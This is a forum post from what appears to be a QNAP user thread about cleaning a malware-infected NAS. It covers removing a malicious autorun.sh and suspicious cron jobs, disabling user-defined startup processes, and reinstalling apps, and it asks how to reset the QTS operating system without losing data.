Thanks, have done that and removed the autorun.sh. Delete everything I could find and also removed all suspicious cron jobs. The NAS is restarted and the jobs are removed permanently seems.Mousetick wrote:Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
Today I go into .qpkg folder and found many files being hacked, now I reinstalled all apps. Hopefully that's it. Otherwise I have to start from scratch
Anybody know if QNAP provide a way to completely reset QTS OS and leave data unchanged?